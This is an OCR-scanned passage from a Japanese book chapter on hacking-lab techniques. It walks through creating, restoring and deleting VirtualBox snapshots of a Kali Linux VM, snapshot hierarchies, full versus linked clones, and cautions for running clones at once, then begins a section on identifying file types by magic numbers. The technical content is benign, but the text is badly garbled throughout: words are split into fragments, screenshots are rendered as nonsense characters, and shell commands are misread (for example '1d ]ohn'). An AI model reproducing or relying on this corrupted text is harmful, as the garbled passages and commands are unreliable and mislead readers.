画面 が 表示 され ます 。 


② ス ナッ プシ ョ ッ ト を 作成 する 

名 前 と 説明 の 記入 欄 が あり ます 。 説明 に は 、 ス ナッ プシ ョ ッ ト を 作成 し た 状況 
や 理由 な ど を 記載 し て お き 、 復 元 時 に わか りや すく な る よう に し ます 。[OK] ボ 
タン を 押す と 、 ス ナッ プシ ョ ッ ト の 作成 処理 が 実行 され 、 数 秒 後 に は 作成 が 完 
し ます ( 図 11-7) 。 


ここ で は 最初 に 作成 し た Kali の 仮想 マシ ン を 対象 と し て いま す が 、 ど の 仮想 マシ ン で も 構い 
せん 。 
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の アヤ ショッ ア ルン 和 P 朋 ロリ ロ ヨ ッ dl 
スナ ッ プ ショ ッ ト 名 も 表示 され ます 。 





男 |Gii-Linux-2018.2 (64bt) [ 行 中 ] |Oracle VM VirualBox 
フィ イル | 仮 超 マタ ク | 表示 入力 アパ (イス へ ルプ 
citecy 5 Host+S 























スナ ッ プ マツ ョ ッ ト 信 成 .…… Hosf+ 1 
ヤッ ショ ソ 悦 補 .. 


( 咽 評 @ マ シッ の 2 ナッ プシ ョ ト 人 人 不 
メオ ュ ゴ コロ ョ ッ ト や TH 
2 サ > プ ao ト 1 

メ ナ ゥ ゴウ ョ ッ ト 9 謗 果 (pl 


WC て メオ ナッ ブン ョ コット 
ネッ トロ ー カ - ソフ トリ ェ ア ) Ne 詳 活 み 













トン 





上 一 時 税目 

@) リセ ヤット 

ACPI シャ ッ ト ダ ウソ 

(0) 肖 ア を アル (4 本 [9 た 

中 | 

[ の: に を アア メリ アヤ ソル アルン IP に 
の 四 作成 | 画面 が 表示 され ます 。 









スナ ッ プ ショ ッ ト 名 と 説明 を 記入 w AA - 
4 し ます 。 
sf_share ーー で 、、 。③ 【OK] ボタ ン を 押す と 、 ス ナップ 


ピナ ト が 作成 され ます 。 


図 11-7 スナ ッ プ ショ ッ ト を 作成 する 


3 仮想 マシ ン の OS を 終了 する 

仮想 マシ ン の 上 部 の 、 仮想 マシ ン 名 と 状態 (実行 中 ] と 表示 され て いる ) の 間 
に 、 ス ナッ プシ ョ ッ ト 名 が 表示 され て いる は ず で す 。 

スナ ッ プ ショ ッ ト が 作成 され た ら 、 仮想 マシ ン の OS を 終了 し ます 。 続け て 、 次 
に 解説 する VirtualBox か ら ス ナッ プシ ョ ッ ト を 作成 する 方 法 を 試し て くだ さい 。 


念 VirtualBox か ら ス ナッ プシ ョ ッ ト を 作成 する 方 法 
VirtualBox の メイ ン 画 面 か ら ス ナッ プシ ョ ッ ト を 作成 する に は 、 次 の よう に し 
まし 。 


① 「 ス ナッ プシ ョ ッ ト | タブ を 表示 する 
VirtualBox の メイ ン 画 面 に て マシ ン ツ ー ル ボタ ン の 矢印 を 押し て 、 ス ナッ プ 
ショ ッ ト を 選び ます ("3)。 す る と 、「 ス ナッ プシ ョ ッ ト 」 タプ が 表示 され ます 。 


3 : VirtualBox の パー ジョ ン に よっ て は 、 ス ナッ プシ ョ ッ ト 画 面 の 表示 方 法 や イン ター フェ ー ス 
が 美 な り ま す 。 
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② ス ナッ プシ ョ ッ ト の 履歴 を 確認 する 

メイ ン 画 面 に て 、 ス ナッ プシ ョ ッ ト を 作り た い 仮想 マ シン を 選び ます 。 そ し て 、 
「 ス ナップ ショ ッ ト 」 タプ を 押し ます 。 す る と 、 選択 し て いる 仮想 マシ ン の スナ ッ 
プシ ョ ッ ト の 履歴 が 表示 され ます 。 先ほど 作成 し た 「 ス ナッ プシ ョ ッ ト 1」 が 存在 
する は ず で す ( 図 11-8)。 


層 Oracle VM Virtua Box マネ キー ジャ ー 
rf 有 MMF) 仮 担 マジ ッ IMD ヘル HH| 


作 責 可 2 4 時 了 


マン スナ ッ プ ショ ッ ト 1 ーー 2n1MO6711 1 を 3 記 [17 分 晴 ) 





図 11.8 スナ ッ プ ショ ッ ト の 履歴 


3③ ス ナッ プシ ョ ッ ト の 詳細 を 見 る 

スナ ッ プ ショ ッ ト の 辞 細 を 知り た い 場 合 に は 、 適 当 な スナ ッ プ ショ ッ ト を 選択 
し 、 右 クリ ッ ク し て | プロパ ティ 」』 を 選び ます (ある い は | プロ パテ ィ 」 ア イコ 
ン を 押し ます )。 す る と 、 下 部 に プロ パテ ィ ペ イン が 表示 され 、 属 性 (スナ ッ プ 
ショ ッ ト 名 と 説明 )、 情 報 (ハー ドウ ェ ア の 構成 な ど ) を 表示 ・ 編 集 で きま す ( 図 
11.9)。 
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層 Orxle Vh4 VirtJa 9ox マキ ー ジ ャ ー 
2 の の 







y 国 サッ ョ ッ ト (3 了 | 団 績 WO 








二 記 マ 

























cs KalLLimx -2W 1 は ( 5 の 再度 押す と 、 プロ パテ ィ 
ュー ー、 L: 有 語ら > 周 mnS ペイ ン が 消え ます 。 
名 町 T 
0 上 4mIA エ EE 放 所 あお IT 7 





ン を 押す と 、 プ ロ パ ティ (9 爺 新 の 上 ( 変 ) 
ペイ ン が 表示 され ます 。 





選任 A| 人 琴 D 
名 線 (Nr | メオ ッ プシ ジョット 1 


ENEOD 
の ュ ア )08 二 清 み 
























図 11.9 プロ パテ ィ ベ イン の 表示 


ここ で は | プロ パテ ィ 」 アイ コン を 再度 押し て 、 プ ロ パ ティ ペイ ン を 消し て お 
さま す 。 


(④2 つ 目 の ス ナッ プシ ョ ッ ト を 作成 する 

「 最 新 の 状態 (変更 )」 を 選択 し て 右 ク リッ ク し 、 「 作 成 ] を 選び ます (ある い は 
[作成 |] アイ コン を 押し ます )。 す る と 、 和 仮想 マシ ン の スナ ッ プ ショ ッ ト 作 成 」 画 
面 が 表示 され ます 。 ス ナッ プシ ョ ッ ト 名 と 説明 を 入力 し て か ら [OK] ボタ ン を 押 
し ます 。 2 つ 目 の スナ ッ プ ショ ッ ト は 差分 に な る の で 、 す ぐに 作成 処理 が 終わ り ま 
す 。 す る と 、 ス ナッ プシ ョ ッ ト の 階層 構造 に スナップ ショ ッ ト 2」] が 現れ ます 
( 図 11-10)。 
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飛 Oracle VN UirtJa Box マネー ジャー 
rf 有 MFP) 収 担 マ ジン IMD ヘル 昌 | 





「 加 ユナ ッ プ ショ ッ ト S) 等 | 回 | RWD) 穫 
w に 相 ・ 「 1 


作家 削 了 DD プロ テバ P) カロ ーー<C) 
も 症 民 把 
マ スラ ブイ ショット 1 2n1WDsr11 1 記 [5 分 前 ) 





ン 思 47 プ 7 ショット 2 {6{〔{〔 ぃ = 
W 還 赤 の が 





図 11.10 「 ス ナッ プシ ョ ッ ト 2| が 現れ た 


光 スナ ッ プ ショ ッ ト の 復元 

スナ ッ プ ショ ッ ト を 復元 (リス ト ア ) する に は 、 復 元 し た い ス ナッ プシ ョ ッ ト 
を 選び 、「 復 元 」 を 選ぶ だ け で す 。 こ こ で は 復元 され た こと を 体験 する た め に 、 次 
の 手順 を 行い ます 。 


①) 仮 想 マ シン を 起動 する 

| 最新 の 状態 」 を 選択 し て 、| 起動 」 アイ コン を 押し ます ("4)。 す る と 、 仮 想 マ 
シン が 起動 し ます 。 ス ナッ プシ ョ ッ ト の 履歴 画面 で は 、 | 最新 の 状態 」 の 左側 に あ 
る アイ コン が 、 停 止 マ ー ク か ら 再 生 マ ー ク に 切り 替わっ て いる は ず で す 。 


② ユー ザー を 作成 する 


立ち 上 が っ た 仮想 マシ ン (Kali) で ログ イン し 、 実 験 と し て ユー ザー を 作成 し ま 
す 。 


4 : 実際 の と ころ 、| 最新 の 状 双 ] を 選択 せ ず に | 起動 ]」 アイ コン を 押し て も 問題 あり ませ ん 。 
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Poot 仙 ka11:<# useradd ]ohn 
root@⑱ka11:<-# 1d ]ohn 
u1d=1991( ]ohn ) g1d=1991( ]ohn ) groups=1991( ]ohn ) 


その 後 、Kali を 終了 し ます 。 
③ ス ナッ プシ ョ ッ ト を 復元 する 


スナ ッ プ ショ ッ ト の 履歴 画面 で 「 ス ナッ プシ ョ ッ ト 2」| を 選択 し て 、「 復 元 」 を 
選び ます ( 図 11-11 ) 。 


w3 9 思 ゅ 
EXCTD) D) 傷 宮 フロ KTP) 5 ロー 


| TH ーRFrsg 
(⑳) 長 折 の 避 ( 変 更 ] CtrlsShiftD 


】 ブロ /( テ ィ (Pl Ctrl+Space 





( ゅ 2 ロ - ツ 0. Ctrl*ShiftrC 
図 11-.11 スナ ッ プ ショ ッ ト の 復元 


復元 し よう と する と 確認 グ ゲイ アダ イア ログ が 表示 され 、 現 在 の マシ ン の 状態 の 
スナ ッ プ ショ ッ ト を 作成 する か どう か を 聞か れ ま す ( 図 11-12)。 


9 Virt」alBox - 当 隊 ? XX 


ie ュ ナ オッ プシ ジョ ッ ト 2 記 は ト 
し と うと し て いま す 。 


2 


Ao22020 し まし ます 。 


現在 四 マ ツン リロ 状 能 軸 ュ オ ュ プ ブシ ジョット 話 作 成 


図 11-12 復元 時 の 確認 ダイ アロ グ 





ここ で は チェ ッ ク を 入れ て 、[ 復 元 ] ボタ ン を 押し ます 。 新しい スナ ッ プ ショ ッ 
ト を 作る こと に な る の で 、 ス ナッ プシ ョ ッ ト 和 名 と 説明 を 入力 し な けれ ば な り ま せ 
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ん 。 こ こ で は 、 ス ナッ プシ ョ ッ ト 名 に | スナ ッ プ ショ ッ ト 3」、 説 明 に |john ユー 
ザー を 追加 し た 後 」 と 入力 し ます ( 図 11-13)。 


境 伝 寺 マツ ソ の スナ ッ プ ショ ッ ト 作 克 ? 4 


ュ オナ s プ bay ト 名前) 


スナ ゥ ブシ ジョ ッ ト @ 説 8 軌 0) 
jn ユー ザー を 人道 し た 授 





図 11-13 「 ス ナッ プシ ョ ッ ト 3] の 作成 直前 


[OK] ボタ ン を 押す と 、「 ス ナッ プシ ョ ッ ト 2| の 下 に 「 ス ナッ プシ ョ ッ ト 3」| が 
現れ 、| ス ナッ プシ ョ ッ ト 2」| の 同 階層 に | 最新 の 状態 」 が 現れ ます ( 図 11-14)。 階 
層 構 造 に つい て は 次 の 項目 で 解説 する の で 、 こ こ で は あま り 気 に し な く て 結構 で 








す 。 

作成 (D 野人 DI | 所 元 (Ri プロ パティ (PD カロ ーー 人 O] 

名 前 

ン 呈 スナ ッ フ ショット 1 

マ 喝 ガッ プシ ョ ッ ト 2 
映 2 セ フ シ ョ ッ ト 3。 

図 11-14 「 ス ナッ プシ ョ ッ ト 3] が 作成 され た 

④) 最新 の 状態 を 確認 する 


「 最 新 の 状態 」 を 選ん で 、 起動 し ます 。 Kali に ログ イン し た ら 、id コ マン ド で john 
ユー ザー の 有無 を 確か め ま す 。 
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root 引 ka11:<# 1d ]ohn 
1d ']ohn': no such user 


john ユ ー ザ ー は 存在 し な いこ と が わか り ま す 。 つ まり 、john ユ ー ザ ー の 作成 前 
の 状態 に 戻っ た こと を 確認 で きま し た 。 そ れ で は 、Kali を 終了 させ ます 。 


(5) 「 ス ナッ プシ ョ ッ ト 3」| を 削除 する 

スナ ッ プ ショ ッ ト の 履歴 画面 で で [スナップ ショ ッ ト 3」] を 選ん で 「 削 除 」 を 選 
び ま す 。 す る と 、 ダ イア ログ が 表示 され ます が 、 [削除 ] ボタ ン を 押し ます ( 図 11- 
15) 。 


@ VirtualBox - 管 央 ? XX 


ュ イ オゥ ブシ ョ ッ ト 色 月 疲 ま する と 、 ス オ ッ プシ ョ ッ ト に 
⑳⑫ 格 さ れれ て いる 情 都 は われ 、 VirtualBex が ス 
十 ッ フシ ョ ッ ント と に 作成 た 春吉 の ディスク テー 


) さ れ ま す 。 こ れ に は 

の る か も し れ ま 2。 で し て スゴ 

ショ ッ ト り 情報 を 名 1『 す る に と は CS ませ ん 。 
ュ +o プ bay ト " ス ナッ プシ ョ ッ ト 3 際 ま 





図 11-15 削除 の 確認 ダイ アロ グ 


する と 、 ス ナッ プシ ョ ッ ト の 履歴 画面 で は 、| ス ナッ プシ ョ ッ ト 3」| が 消え 、 1 本 
の 枝 に な り ま し た 。「 ス ナッ プシ ョ ッ ト 3| を 作成 する 前 の 状態 と 同じ 見 た 目 に 
な っ て いま す ( 図 11-16) 。 


5 


⑳ 弁 台 
ff 成 D 前 (DD) 人 夏 元 [RDN づ ロバ ティ [PD カロ ーー の 〇 ) 
名 十 


y 【 鹿 スナ ッ プシ ョ ッ ト 1 
Y 【 過 ス ナッ プシ ョ ッ ト 2 
人 呈 炎 の 伺 変 宮 。 。 





図 11-.16 「 ス ナッ プシ ョ ッ ト 3] を 削除 し た 





| 第 11 章 | ハッ キン グ ・ ラ ボ に 役立つ テク ニッ ク 771 


光 スナ ッ プ ショ ッ ト の 階層 構造 を 理解 し よう 

以上 で は スナ ッ プ ショ ッ ト の 操作 方 法 (作成 ・ 復 元 ・ 削 除 ) を 解説 し まし た 。 し 
か し な が ら 、 操 作 の 手順 だ け に 注目 し て お り 、 階 層 構 造 に つい て は あま り 注 目 し 
て いま せん で し た 。 ス ナッ プシ ョ ッ ト を より 活用 する た め に は 、 階 層 構 造 を 理解 
する 必要 が あり ます 。 

スナ ッ プ ショ ッ ト 名 や 説明 だ け で は 、 ス ナッ プシ ョ ッ ト の 管理 が 類 雑 に な っ て 
し まう た め 、VirtualBox で は 最新 の 状態 か ら 見 て どの くら い 前 に スナ ッ プ ショ ッ 
ト を 作成 し た の か が 、 ス ナッ プシ ョ ッ ト 名 の 右 に 表示 され る よう に な っ て いま す 。 
さら に 、 階 層 構 造 に 注目 する と 、 階 層 を 上 が る に つれ て 過去 の 状態 を 示す こと が 
わか り ま す 。 

まず 「 ス ナッ プシ ョ ッ ト 1」] を 復元 し た 場面 を 想像 し て くだ さい 。 復元 し た 直後 
の 仮想 マシ ン (の 最新 の 状態 ) は 、「 ス ナッ プシ ョ ッ ト 1」| と 同じ で す が 、1 秒 経過 
後に は 「 ス ナッ プシ ョ ッ ト 1」 の 状態 か ら ず れ て いる こと に な り ま す 。 つ まり 、「 最 
新 の 状態 ] と いう 項目 が 「 ス ナッ プシ ョ ッ ト 1」 か ら 新 た に 枝分かれ する と 想像 で 
きま す *5)。 

実際 に 確か め て み ま し ょ う 。 た だ し 、「 現在 の マシ ン の 状態 の スナ ッ プ ショ ッ ト 
を 作成 ] と いう チェ ッ ク は 外し て お きま す ( 図 11-17) 。 


| 間 | ゆ 
作成 前 了 ) 人 後 刀 フロ ぽ P) 2 ロー 
名前 


Y は スナ ッ プ ショ ッ ト 1 





図 11-.17 「 ス ナッ プシ ョ ッ ト 1」 を 復元 し た と ころ 


想像 し た 通り に な り ま し た 。 復元 する 直前 の | 最新 の 状態 」] は な く な っ て いま 
す 。 

次 に 、 こ の 仮想 マシ ン の スナ ッ プ ショ ッ ト を すべ て 削除 し た い 場 面 を 想像 し て 
くだ さい 。 つ まり 、「 最 新 の 状態 」 の 仮想 マシ ン だ けが 残れ ば よい と いう こと で す 。 


5 : [最新 の 状態 」| は 「 ス ナッ プシ ョ ッ ト 2| と は 独立 な の で 、「[ ス ナッ プシ ョ ッ ト 2| の 枝 の 下 に 
くる こと は あり ませ ん 。 つ まり 、「 最新 の 状態 ] と 「 ス ナッ プシ ョ ッ ト 2| は 別 の 枝 で あり 、[ ス 
ナッ プシ ョ ッ ト 1」| か ら 分 岐 す る こと に な り ま す 。 
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「 最 新 の 状態 」 か ら 見 て 、 最 上 位 の 「 ス ナッ プシ ョ ッ ト 1」 を 削除 すれ ば 、 す べ て 
の スナ ッ プ ショ ッ ト が な く な る と 想像 で きま す 。 実際 に 確か め て み ま す 。 

スナ ッ プ ショ ッ ト を 削除 し よう と する と 、 警 告 ダ イア ログ が 表示 され ます 。 
メッ セー ジ の 内 容 に よる と 、 枝 に ぶら 下がっ て いる スナ ッ プ ショ ッ ト は 削除 され 、 
その 際 自 動 的 に 情報 が 統合 され る と の こと で す ( 図 11-18) 。 


作成 (T) 削除 (D) 、 優 元 (ROD ブ プロパティ バ (P) クロ ー ン C) 












名 前 作成 
マ ( 遇 スナップ ショ ッ ト 1 [に ] 2018/06/11 14:32 (1 時 間 前 ) 
に PD 上 …-、 還 TFP OPT 


選 最新 の 状態 


[( 復元 (R) Ctrl+Shift+R 
( 記 。 プロ バテ イ (P).… Ctrl+Space 


上 本 オ - 19 たき. 下 


( ゅ クロ ー ツ (O.. Ctrl+Shift+C 








②③ 本当に 削除 し て よい か が 、 故 告 ⑲ ViruslBox 人 同 * ま  : 病 
ダイ アロ グ が 表示 され ます 。 


[2 度 300EG Eh 
180 の 70 に 2 

EPS 

MT する こ 


スイ オッ ュ プ ジョット" ス オ ッ プシ ョ ッ ト 1" 引取 し ま 
すか 7 。 






③ 削 除 す る 場合 に は [削除 
ポ ボタン を し ます 。 本 


図 11-18 スナ ッ プ ショ ッ ト の 削除 





問題 が な い の で 、[ 削 除 ] ボタ ン を 押し ます 。 す る と 、 エ ラー ダイ アロ グ が 表示 
され て 、 削 除 に 失敗 し まし た 。| 詳細 ] を 確認 する と 、 削 除 対象 の スナ ッ プ ショ ッ 
ト に 「 最新 の 状態 」 と 他 の スナ ッ プ ショ ッ ト が 存在 し た た めで し た ( 図 11-19)。 





| 第 11 章 | ハッ キン グ ・ ラ ボ に 役立つ テク ニッ ク 773 


疹 VirtuglBox ・ エ ラー ? X 


ソン "Kai-Linux-2013 4bit)"O 


.2 (6 
き ココ トマ 本 1| 3 
ド ん ン ョ ッ ト ” スナ サップ ショ ッ ト 1" 若 際 に 夫 


Snspshot "メサ ナップ ブツ ョ ッ ト 1 ct thc mochinc "Kali- 
Linux-2018.2 (4bit) rro1 be deleied 
boosuo0 9 1ho curront enapohot rd hoe oro 
cl 旧 snapshal. 


祭 了 VBOX E_ TRYaLTD OBECT STATE 
コード: (oxgoBB0o07] 


未 人 - SessionMacrans 
テト : 


イン ウー 人 achine 借 5cd9498- 
フィ ー ル as71 仕 4889-281c- cs1odBcd 問 





図 11-19 削除 し よう と し た と き の エ ラー 


そこ で 、 余 分 な スナ ッ プ ショ ッ ト を 削除 し て 、 校 を 減ら すこ と に し ます 。 具体 
的 に は | スナ ッ プ ショ ッ ト 2」| を 削除 し 、 次 に 「 ス ナッ プシ ョ ッ ト 1」| を 削除 し ま 
す 。 今度 は エラ ー が 表示 され ず 、 「 最新 の 状態 」 だ けが 残り まし た 。 こ れ で 、 ス 
ナッ プシ ョ ッ ト が すべ て な く な っ た 状態 に な り 、 ス ナッ プシ ョ ッ ト の 作成 を 試す 
前 の 状態 に 戻っ た と いえ ます ( 図 11-20) 。 


飛 Oracle VM Virtua Box マキ ネー ジャー 
rf 有 MP 仮 揚 マジ ン IMD ヘル プ 'HI 


( 謗 マ ・ (mo | ms) の 上 . 
新 夫 ( 計 室 ( く | 駅 記入 本 や ツー ルル お ロー ルル ツー 話 


ピー、 Kali-Limux-20 1 
Up rl IF を >| * っ 

作 長 TI 形 了 DD | 撲 エ [RR コロ) テバ PD カロ ー>XC) 

月 

大 量 拓 の な 誠 





図 11.20 スナ ッ プ ショ ッ ト を 全 削 除 し た 状態 
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交 フロ ー ン を 活用 し よう 


VirtualBox で は 、 仮想 マシ ン の コピ ビー を 作成 で きま す 。 こ れ を 「 コ ピー の 作成 」 
と いわ ず 、| クロ ー ン の 作成 ] と いい ます 。 スナ ッ プ ショ ッ ト と クロ ー ン に つい て 、 
一 言 で 表現 すれ ば 、 ス ナッ プシ ョ ッ ト は ロー ル バ ッ ク 、 ク ロー ン は 複製 と いえ ま 
す 。 

クロ ー ン は 、 シ ステ ム を レプ リケーション 化 (6) し た り 、 使い 捨て の 検証 マシ 
ン を 用 意 し た りす る 際 に 、 便 利 な 機能 で す 。 

クロ ー ン は 仮想 マシ ン の コピ ビ ピー な の で 、 ク ロー ン 元 (オリ ジ ナ ル ) の 仮想 マシ 
ン と クロ ー ン 人 後 の 仮 想 マ シン を 同時 に 起動 で きま す 。 た だ し 、 ク ロー ン し た 直後 
は 、 ク ロー ン 元 と 同じ ネッ トワ ー ク 朗 定 に な っ て いま す 。 つ まり 、 ク ロー ン 肖 が 
静 的 IP アド レス を 設定 し て いた 場合 、 そ の まま オリ ジ ナ ル と クロ ー ン を 起動 し て 
し まう と 、IP ア ドレ ス が 重複 し て し まい ます 。 同時 に 起動 する 前 に 、 ど ちら か の 
IP アド レス を 変更 し て お く 必 要 が あり ます 。 


但 クロ ー ン の タイ プ 
クロ ー ン に は 、「 す べ て の クロ ー ン | と 「[ リ ンク し た クロ ー ン 」 の 2 つの タイ プ 
が あり ます 。 


すべ て の クロ ー ン 
すべ て を コピ ビー す る の で 、 ク ロー ン 元 で ある 仮想 マシ ン を 削除 し て も 、 ク ロー 
ン し た 仮想 マシ ン を 利用 で きま す 。 た だ し 、 ク ロー ン 元 の ディ スク 領域 分 だ け 、 新 
た に 必要 に な り ま す 。 ま た 、 ク ロー ン の 作成 に 要する 時 間 も 長 く か か り ま す 。 


リン ク し た クロ ー ン 

クロ ー ン 元 の 仮想 マシ ン (の 現在 の ディ スク ドラ イブ の ファ イル ) を も と に し 
て 、 そ の 差分 で クロ ー ン 先 の ディ スク ドラ イブ の ファ イル を 構成 し ます 。 つ まり 、 
クロ ー ン され た 仮想 マシ ン の 容量 は 少な く て 済み ます が 、 ク ロー ン 元 の 仮想 マシ 
ン を 削除 で きま せん 。 


6: ソフ トウ ェ ア や ハー ドウ ェ ア の 冗長 構成 で 一 貫 性 の ある リソー ス を 保ち な が ら 、 情 報 を 共有 
する 仕組 み の こ と で す 。 例え ば 、DBMS (デー タベース 管理 ソリ ソフトウェア) は リプ リケーション 
機能 を 備え を て お り 、 マ スタ ー で ある デー タベース に 隆 害 が 発生 し て も 、 複 製 し た 別 の デー タ ベ ー 
ス で すぐ に 処理 で きま す 。 
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メイ ンマ シン 上 だ け で クロ ー ン を 活用 し た い の で あれ ば 、| リ ンク し た クロ ー 
ン 」 が 非常 に 強力 だ と いえ ます 。 


免 クロ ー ン を 作成 し て みよ う 
クロ ー ン (コピ ビー し た 仮想 マシ ン ) は 、 ス ナッ プシ ョ ッ ト を も と に し て 作ら れ 
ます 。 


① ス ナッ プシ ョ ッ ト を 作成 し て お く 
仮想 マシ ン の スナ ッ プ ショ ッ ト 「 ス ナッ プシ ョ ッ ト 1」| を 作成 し て お きま す 。 


② ク ローン を 作成 する 

| スナ ッ プ ショ ッ ト 1」 の クロ ー ン を 作成 し た いと し ます 。 ス ナッ プシ ョ ッ ト の 
履歴 画面 に て 、|「 ス ナッ プシ ョ ッ ト 1」 を 選び 、 右 クリ ッ ク の | クロ ー ン 」 を 選び 
ます ( 図 11-21)。 


5 虹 還っ ゆ 
7) 削 陸 KD) | 慢 元 (RNN プロ / テ PD 5 ロー 
る 


ツ 








ショット 1 
最新 の 状 表 ( 記 前 (pi CtH+Shift=D 


( 記 剖 元 (B) Ctrl+ShiftsR 
(9 フロ (ティ (P).… Ctrl+Spacc 


( み 2 ロ - ツ (- Ctrl+Shift= て 








図 11.21 「 ク ロー ン 」 を 選択 


クロ ー ン の 作成 ウィ ザー ド が 表示 され ます 。[ エ キス パー トモ ー ド 」] ボタ ン を 押 
し ます ( 図 11-22) ("7)。 


7 : エキ スパ ー ト モー ド の 方 が 、 手 順 が 少な く て 済み ます 。 
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で 宏 和 マ シ ツ の グロ ー ツ 


新しい マッ ツン 名 
し ( ! 吉 マ ツン の で 前 湊 折 し て くだ ts し い 括 生 マツ ッ ド 


の 5 ロー に な る で 


|kartrex-30182 (54bt) 2 ロー ン | 


すべ て の ネッ ト つ ー リ カー ド の NIC アプ ド し ヌ を 再 初 晒 (RO 


Kali-Limux-2013 2 


エキ スパ ー ト モー ド IEI| | wwy セ ル | 


図 11-22 仮想 マシ ン の クロ ー ン の 作成 ウィ ザー ド 





新しい 名 前 (クロ ー ン 後 の 仮想 マシ ン の 名 前 に な る ) を 入力 し 、「 す べ て の ネッ 
トワ ー ク の MAC ア ドレ ス を 再 初期 化 ] に チェ ッ ク を 入れ ます 。 こ こ で は クロ ー ン 
の タイ プ は 「 す べ て の クロ ー ン 」|」 に し ます ("8)。 

スナ ッ プ ショ ッ ト の 項目 で 「 現 在 の マシ ン の 状態 」 を 選ぶ 示 と 、 ス ナッ プシ ョ ッ 
ト が な い 状 態 で タク ロー ン さ れ ま す 。 一 方 、|「 すべ て 」 を 選 志 と 、 ク ロー ン 元 の ス 
ナッ プシ ョ ッ ト を 保持 し ます 。 こ こ で は 、「 現在 の マシ ン の 状態 」 を 選び ます 。 設 
定 後 、 [クローン] ボタ ン を 押し ます ( 図 11-23) 。 


と 折 想 マツ ツ の グ クローン 


聞 し い マ ツン 名 [NN 
KalrLruz-20182 (64b) 林 2 の ロー ツリ 
り ロ ー ン の タイ ブ スナ ッ プ ジョ ッ ト 


⑱) すべ て を ウロ ー^ バ F) ⑱) 8 在 ロ で の 株 衣 (M) 
(リン DL た り ロ ー バ DD 3 き ド CE] 


すべ て の の ネ ュ ドコ ー ロ ロー RINEC ア ド し ス を 戸 写 明 化 (R) 
イド け で モー ド (Q | ww ン セ ル | 


図 11.23 エキ スパ ー ト モー ド の 設定 画面 





3 : | すべ て の クロ ー ン 」 を 選択 し た 際 は 、 か な り 時 間 が か か り ま す 。 ス ペッ ク に も より ます が 、 
10 分 で らい は 想定 し て くだ さい 。 
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3 作成 され た クロ ー ン を 確認 する 
クロ ー ン が 作成 され る と 、 メ イン 画面 の 左 ペ イン に 仮想 マシ ン と し て 表示 され 
ます 。 ス ナッ プシ ョ ッ ト は コピ ー さ れ て いな いこ と も わか り ま す ( 図 11-24)。 


飛 Oracle VM VirtualBox マネ ー ジ ャ ー 
フイ 川 (F) 倒 直 マシ ッ [M) ハル プ (H) 


 - 引っ ro s | 回 BW9 ョ ) 認 2 全 20 
ザ ロ ー バ ルリ ーJ(G) 


箱 寺 (D 詩 定 (5) 璧 芝 玉 聞 ) マシ シン ツ ー 中 N) 


【@) に 抽 (54bi) (スナ > プ .) [@ 


作 記 KDD 記 元 (ROD フロ 生 バ PD 2 ロー- バ O) 
ロー Kal_ | mu テーVW1# け (4ht) 07 ロ 一 ソ 宅 斉 


宮寺 
2 民 旦 新 の 状 和 











図 11.24 クロ ー ン の 作成 後 


クロ ー ン され た 仮想 マシ ン の フォ ル ダ ー が どこ に 生成 され た か を 確認 する と 、 
「 デ フォ ルト の 仮想 マシ ン フ ォ ル ダー」 (9) 配下 に な っ て いる こと が わか り ま す 
( 図 11-25)。 


9 : 具体 的 な パス に つい て は 、2-.3 を 参照 し て くだ さい 。 
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(MM Koirunux-301 ま > (5tbO の 70 ローン - 


ハス 0 
SiSau す stste 上 ne' 記 ) 
_」 ポ 9 ド 730TTIKH) 
情 寺 





が 1 フ つぼ 室 い 専 宙 (UMDGO 
販 4037 な す イ ズ Ionl GB 


2 人 の 9 イス 1521 GR 
ttD で イコ 


AmJL EL 


ュー ザー イツ グー フェ ー ス 





図 11.25 クロ ー ン の スト レー ジ の パス 


免 クロ ー ン 元 と クロ ー ン を 同時 に 起動 する 
クロ ー ン 元 と クロ ー ン を 同時 に 起動 する と き に は 、 次 の 設定 項目 に 注意 し ます 。 


* IP アド レス : 静 的 IP アド レス の 場合 は 、 調 整 する 。 

*・ MAC ア ドレ ス : ク ロー ン の 作成 時 に 、 再 初期 化 の 項目 が ある 。 ま た 、 仮想 LAN 
アダ プター の 「 高 度 な 設定 ] で MAC ア ドレ ス を ラン ダム に 生成 し 直せ る 。 

* Windows の 内 部 番号 : SID (Security Identifier : セキ ュ リ ティ 識別 子 ) (*10) は 
重複 し て も 問題 な いと Microsoft が 言及 し て いる が C11)、 お まじ な いと し て コ 
ンピュータ 固有 の 情報 を リセット する た め に シス テム 人 準備 ツー ル (Sysprep. 
exe') を 実行 する べき と いっ て いる 。 


*10 : Windows シス テム で 用 いら れる ユー ザー、 グ ルー プ 、 マ シン を 一 意 に 識別 する た め 値 の こと 


で す 。 


*11 : https//technetmicrosoft.com/ja-jp/windows/mark 12aspx 
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TL6 | ファ イル の 種類 を 特定 する 





ファ イル の 種類 を 特定 する 際 に 、 フ ァイル 名 や 拡張 子 が 参考 に な り ま す が 、 完 
忌 と は いえ ませ ん 。 特に 、 シ ステ ム が 生成 し た ファ イル は 、 フ ァ イル 名 が 不 規則 
で ある こと も 多く 、 フ ァイル の 種類 を 判別 し に くい と いえ ます 。 ま た 、 あ えて わ 
か り に くい ファ イル 名 に され て いた り 、 拡 張子 が 省略 され て し まっ た りす る こと 
も あり ます 。 特に 、 ウ イル ス や マル ウェ ア は 意図 的 に 紛らわしい ファ イル 名 に 
な っ て いま す 。 

ここ で は 正しく ファ イル の 種類 を 特定 する 方 法 を 紹介 し ます 。 


バイ ナリ エディ ター で 調査 する 


バイ ナリ ファ イル は 構造 的 に ヘッ ダー と フッ ター を 持つ 場合 が あり ます 。 ヘッ 
ダー は 先頭 部 分 、 フ ッ タ ー は 末尾 部 分 を 指し ます 。 ヘ ッ ダ ー に は 、 フ ァイル の 議 
別 子 (マジ ッ ク ナ ン バ ー と る も 呼応)、 フ ァイル 名 、 サ イズ 、CRC な ど と いっ た 情報 
が 格納 され て いま す 。 特に 、 フ ァイル の 識別 子 は 、 フ ァイル の 先頭 に 存在 する 数 
バイ ト の 情報 で あり 、 フ ァイル の 種別 を 示し ます 。 よ っ て 、 バ イナ リエ ディ ター 
を 用 いれ ば 、 ヘ ッ ダ ー や フッ ター 内 の ファ イル の 識別 子 か ら 、 種 別 を 特定 で きま 
す ( 図 11-26)。 


同 で 台 年 (E) Pr - 共 琴 (S) 傘 定 ( ひ ) ーーーー 7W ア ( ロ ) 


に "| 紹 刺 誰 BL は ルコ 1 し J し し に JMMT PJL 語 JPM li |e| 
は IT 1 02030 中 ( 順 708 史 四 OBE 中 中 中 [ 革 2S4567690BCUE 
硬 1 | 50 4BD3 04 14000000080096436B4BF7 外 | 鐵 ( 
FU 99 g1 55 00 FL YE 1 MO 29 ul 0 IO 8S 鑑 
